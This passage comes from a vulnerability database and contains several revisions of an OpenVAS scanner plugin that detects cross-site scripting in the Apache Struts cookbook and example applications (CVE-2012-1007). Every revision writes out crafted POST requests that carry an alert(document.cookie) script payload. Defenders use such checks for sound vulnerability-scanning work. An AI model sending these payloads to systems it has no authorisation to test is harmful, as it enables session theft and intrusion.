script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-20 15:59:30 +0200 (Mon, 20 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-08 17:33:28 +0530 (Wed, 08 Feb 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request\n and check whether it is able to read cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws due to an,\n - Input passed via the 'message' parameter in 'processSimple.do' and\n 'processDyna.do' action is not properly verified before it is returned\n to the user.\n - Input passed via the 'name' and 'queryParam' parameter in\n '/struts-examples/upload/upload-submit.do' action is not properly verified\n before it is returned to the user.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an\n attacker to execute arbitrary HTML code in a user's browser session in the\n context of a vulnerable application.\n\n Impact Level: Application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts (cookbook, examples) version 1.3.10 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.3 or later,\n For updates refer to http://struts.apache.org/download.cgi\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=450\");\n script_xref(name:\"URL\", value:\"http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nasport = 0;\nasreq = NULL;\nasres = NULL;\nasRes = NULL;\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nhost = http_host_name(port:asport);\n\n## Make list index pages\nforeach indexpage (make_list(\"/\", \"/welcome.do\"))\n{\n ## Send and Receive the response\n asreq = http_get(item:string(dir, indexpage), port:asport);\n\n if(!isnull(asreq))\n {\n asres = http_keepalive_send_recv(port:asport, data:asreq);\n\n if(!isnull(asres) && \">Struts Cookbook<\" >< asres)\n {\n postdata = \"name=xyz&secret=xyz&color=red&message=%3Cscript%3Ealert\" +\n \"%28document.cookie%29%3C%2Fscript%3E&hidden=Sssh%21+It%\" +\n \"27s+a+secret.+Nobody+knows+I%27m+here.\";\n\n asReq = string(\"POST \", dir, \"/processSimple.do HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n ## Confirm the exploit\n if(asRes =~ \"HTTP/1\\.. 200\" && \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">Simple ActionForm Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n\n if(!isnull(asres) && \">Struts Examples<\" >< asres)\n {\n postdata = '-----------------------------7559840272055538773136052934' +\n '\\r\\nContent-Disposition: form-data; name=\"theText\"\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"theFile\"; fil' +\n 'ename=\"\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"filePath\"\\r\\n' +\n '\\r\\n<script>alert(document.cookie)</script>\\r\\n-----------' +\n '------------------7559840272055538773136052934--\\r\\n';\n\n asReq = string(\"POST \", dir, \"/upload/upload-submit.do?queryParam=Successful HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: multipart/form-data; boundary=---\" +\n \"------------------------7559840272055538773136052934\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" &&\n \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">File Upload Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n }\n}\n", "title": "Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities", "type": "openvas", "viewCount": 3}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:26:56"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-1007"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.", "edition": 8, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "2a0f28db0c8b9a92470b90fc1837b5fbe57837e0d6b446ba8b5d30b930e7c796", "hashmap": [{"hash": "adb13615c304e59dcac77fe4f514b658", "key": "description"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "efc663435ab5bd98517b05c5b7b21cb1", "key": "pluginID"}, {"hash": "6c5c375f27b9954bea64597d4bcf9b86", "key": "published"}, {"hash": "c546ec5a83c8267a23fb611906cdec7f", "key": "modified"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a282f166ddc6c378940071a6b738e1a3", "key": "reporter"}, {"hash": "63f251d2d4cd1e13840040e6efe06b02", "key": "cvelist"}, {"hash": "f9894c456f964a2678924368315a1c93", "key": "references"}, {"hash": "0196641f940153d37937368a9cc7e88f", "key": "sourceData"}, {"hash": "6726cb59797400dc00f67e6206bce00a", "key": "href"}, {"hash": "8d096a067f3cb257684a509c3f5930d1", "key": "title"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802423", "id": "OPENVAS:1361412562310802423", "lastseen": "2018-09-18T13:43:56", "modified": "2018-09-17T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310802423", "published": "2012-02-08T00:00:00", "references": ["http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt", "http://secpod.org/blog/?p=450"], "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_cookbook_n_exmp_mul_xss_vuln.nasl 11431 2018-09-17 11:54:52Z cfischer $\n#\n# Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802423\");\n script_version(\"$Revision: 11431 $\");\n script_bugtraq_id(51900);\n script_cve_id(\"CVE-2012-1007\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-17 13:54:52 +0200 (Mon, 17 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-08 17:33:28 +0530 (Wed, 08 Feb 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request\n and check whether it is able to read cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws due to an,\n\n - Input passed via the 'message' parameter in 'processSimple.do' and\n 'processDyna.do' action is not properly verified before it is returned\n to the user.\n\n - Input passed via the 'name' and 'queryParam' parameter in\n '/struts-examples/upload/upload-submit.do' action is not properly verified\n before it is returned to the user.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an\n attacker to execute arbitrary HTML code in a user's browser session in the\n context of a vulnerable application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts (cookbook, examples) version 1.3.10 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.3 or later,\n For updates refer to http://struts.apache.org/download.cgi\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=450\");\n script_xref(name:\"URL\", value:\"http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nuseragent = get_http_user_agent();\nhost = http_host_name(port:asport);\n\nforeach indexpage (make_list(\"/\", \"/welcome.do\"))\n{\n asreq = http_get(item:string(dir, indexpage), port:asport);\n\n if(!isnull(asreq))\n {\n asres = http_keepalive_send_recv(port:asport, data:asreq);\n\n if(!isnull(asres) && \">Struts Cookbook<\" >< asres)\n {\n postdata = \"name=xyz&secret=xyz&color=red&message=%3Cscript%3Ealert\" +\n \"%28document.cookie%29%3C%2Fscript%3E&hidden=Sssh%21+It%\" +\n \"27s+a+secret.+Nobody+knows+I%27m+here.\";\n\n asReq = string(\"POST \", dir, \"/processSimple.do HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" && \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">Simple ActionForm Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n\n if(!isnull(asres) && \">Struts Examples<\" >< asres)\n {\n postdata = '-----------------------------7559840272055538773136052934' +\n '\\r\\nContent-Disposition: form-data; name=\"theText\"\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"theFile\"; fil' +\n 'ename=\"\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"filePath\"\\r\\n' +\n '\\r\\n<script>alert(document.cookie)</script>\\r\\n-----------' +\n '------------------7559840272055538773136052934--\\r\\n';\n\n asReq = string(\"POST \", dir, \"/upload/upload-submit.do?queryParam=Successful HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: multipart/form-data; boundary=---\" +\n \"------------------------7559840272055538773136052934\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" &&\n \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">File Upload Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n }\n}\n", "title": "Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities", "type": "openvas", "viewCount": 3}, "differentElements": ["references", "modified", "sourceData"], "edition": 8, "lastseen": "2018-09-18T13:43:56"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-1007"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.", "edition": 10, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "47a1033fba4a39d575bd1d820aa15166d51c00387816db038c42ee31dfff6651", "hashmap": [{"hash": "adb13615c304e59dcac77fe4f514b658", "key": "description"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "e7113ffbe7ea0ac96b1a93980eea330d", "key": "sourceData"}, {"hash": "8be90a922e3fddc17514b9fd17f39e9b", "key": "modified"}, {"hash": "cda3f379f5c476617024346b22f9387b", "key": "references"}, {"hash": "efc663435ab5bd98517b05c5b7b21cb1", "key": "pluginID"}, {"hash": "6c5c375f27b9954bea64597d4bcf9b86", "key": "published"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a282f166ddc6c378940071a6b738e1a3", "key": "reporter"}, {"hash": "63f251d2d4cd1e13840040e6efe06b02", "key": "cvelist"}, {"hash": "6726cb59797400dc00f67e6206bce00a", "key": "href"}, {"hash": "8d096a067f3cb257684a509c3f5930d1", "key": "title"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802423", "id": "OPENVAS:1361412562310802423", "lastseen": "2018-10-12T12:47:22", "modified": "2018-10-12T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310802423", "published": "2012-02-08T00:00:00", "references": ["http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt", "http://struts.apache.org/download.cgi", "http://secpod.org/blog/?p=450"], "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_cookbook_n_exmp_mul_xss_vuln.nasl 11855 2018-10-12 07:34:51Z cfischer $\n#\n# Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802423\");\n script_version(\"$Revision: 11855 $\");\n script_bugtraq_id(51900);\n script_cve_id(\"CVE-2012-1007\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 09:34:51 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-08 17:33:28 +0530 (Wed, 08 Feb 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request\n and check whether it is able to read cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws due to an,\n\n - Input passed via the 'message' parameter in 'processSimple.do' and\n 'processDyna.do' action is not properly verified before it is returned\n to the user.\n\n - Input passed via the 'name' and 'queryParam' parameter in\n '/struts-examples/upload/upload-submit.do' action is not properly verified\n before it is returned to the user.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an\n attacker to execute arbitrary HTML code in a user's browser session in the\n context of a vulnerable application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts (cookbook, examples) version 1.3.10 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.3 or later, \");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=450\");\n script_xref(name:\"URL\", value:\"http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"http://struts.apache.org/download.cgi\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nuseragent = get_http_user_agent();\nhost = http_host_name(port:asport);\n\nforeach indexpage (make_list(\"/\", \"/welcome.do\"))\n{\n asreq = http_get(item:string(dir, indexpage), port:asport);\n\n if(!isnull(asreq))\n {\n asres = http_keepalive_send_recv(port:asport, data:asreq);\n\n if(!isnull(asres) && \">Struts Cookbook<\" >< asres)\n {\n postdata = \"name=xyz&secret=xyz&color=red&message=%3Cscript%3Ealert\" +\n \"%28document.cookie%29%3C%2Fscript%3E&hidden=Sssh%21+It%\" +\n \"27s+a+secret.+Nobody+knows+I%27m+here.\";\n\n asReq = string(\"POST \", dir, \"/processSimple.do HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" && \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">Simple ActionForm Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n\n if(!isnull(asres) && \">Struts Examples<\" >< asres)\n {\n postdata = '-----------------------------7559840272055538773136052934' +\n '\\r\\nContent-Disposition: form-data; name=\"theText\"\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"theFile\"; fil' +\n 'ename=\"\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"filePath\"\\r\\n' +\n '\\r\\n<script>alert(document.cookie)</script>\\r\\n-----------' +\n '------------------7559840272055538773136052934--\\r\\n';\n\n asReq = string(\"POST \", dir, \"/upload/upload-submit.do?queryParam=Successful HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: multipart/form-data; boundary=---\" +\n \"------------------------7559840272055538773136052934\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" &&\n \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">File Upload Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n }\n}\n", "title": "Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities", "type": "openvas", "viewCount": 4}, "differentElements": ["sourceData"], "edition": 10, "lastseen": "2018-10-12T12:47:22"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-1007"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a97073a1ea296bf5e42f2a325f69041069875547077b6b55b987b6e1bb091c59", "hashmap": [{"hash": "adb13615c304e59dcac77fe4f514b658", "key": "description"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "0d704865090534e07b7c35f50e1b1600", "key": "modified"}, {"hash": "efc663435ab5bd98517b05c5b7b21cb1", "key": "pluginID"}, {"hash": "6c5c375f27b9954bea64597d4bcf9b86", "key": "published"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a282f166ddc6c378940071a6b738e1a3", "key": "reporter"}, {"hash": "f47e37cc155650af3b54b31ab9b0ce5e", "key": "sourceData"}, {"hash": "63f251d2d4cd1e13840040e6efe06b02", "key": "cvelist"}, {"hash": "f9894c456f964a2678924368315a1c93", "key": "references"}, {"hash": "6726cb59797400dc00f67e6206bce00a", "key": "href"}, {"hash": "8d096a067f3cb257684a509c3f5930d1", "key": "title"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802423", "id": "OPENVAS:1361412562310802423", "lastseen": "2018-08-24T21:39:38", "modified": "2018-08-20T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310802423", "published": "2012-02-08T00:00:00", "references": ["http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt", "http://secpod.org/blog/?p=450"], "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_cookbook_n_exmp_mul_xss_vuln.nasl 11057 2018-08-20 13:59:30Z asteins $\n#\n# Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802423\");\n script_version(\"$Revision: 11057 $\");\n script_bugtraq_id(51900);\n script_cve_id(\"CVE-2012-1007\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-20 15:59:30 +0200 (Mon, 20 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-08 17:33:28 +0530 (Wed, 08 Feb 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request\n and check whether it is able to read cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws due to an,\n - Input passed via the 'message' parameter in 'processSimple.do' and\n 'processDyna.do' action is not properly verified before it is returned\n to the user.\n - Input passed via the 'name' and 'queryParam' parameter in\n '/struts-examples/upload/upload-submit.do' action is not properly verified\n before it is returned to the user.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an\n attacker to execute arbitrary HTML code in a user's browser session in the\n context of a vulnerable application.\n\n Impact Level: Application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts (cookbook, examples) version 1.3.10 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.3 or later,\n For updates refer to http://struts.apache.org/download.cgi\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=450\");\n script_xref(name:\"URL\", value:\"http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nasport = 0;\nasreq = NULL;\nasres = NULL;\nasRes = NULL;\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nhost = http_host_name(port:asport);\n\n## Make list index pages\nforeach indexpage (make_list(\"/\", \"/welcome.do\"))\n{\n ## Send and Receive the response\n asreq = http_get(item:string(dir, indexpage), port:asport);\n\n if(!isnull(asreq))\n {\n asres = http_keepalive_send_recv(port:asport, data:asreq);\n\n if(!isnull(asres) && \">Struts Cookbook<\" >< asres)\n {\n postdata = \"name=xyz&secret=xyz&color=red&message=%3Cscript%3Ealert\" +\n \"%28document.cookie%29%3C%2Fscript%3E&hidden=Sssh%21+It%\" +\n \"27s+a+secret.+Nobody+knows+I%27m+here.\";\n\n asReq = string(\"POST \", dir, \"/processSimple.do HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n ## Confirm the exploit\n if(asRes =~ \"HTTP/1\\.. 200\" && \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">Simple ActionForm Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n\n if(!isnull(asres) && \">Struts Examples<\" >< asres)\n {\n postdata = '-----------------------------7559840272055538773136052934' +\n '\\r\\nContent-Disposition: form-data; name=\"theText\"\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"theFile\"; fil' +\n 'ename=\"\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"filePath\"\\r\\n' +\n '\\r\\n<script>alert(document.cookie)</script>\\r\\n-----------' +\n '------------------7559840272055538773136052934--\\r\\n';\n\n asReq = string(\"POST \", dir, \"/upload/upload-submit.do?queryParam=Successful HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: multipart/form-data; boundary=---\" +\n \"------------------------7559840272055538773136052934\\r\\n\",\n \"Content-Type: 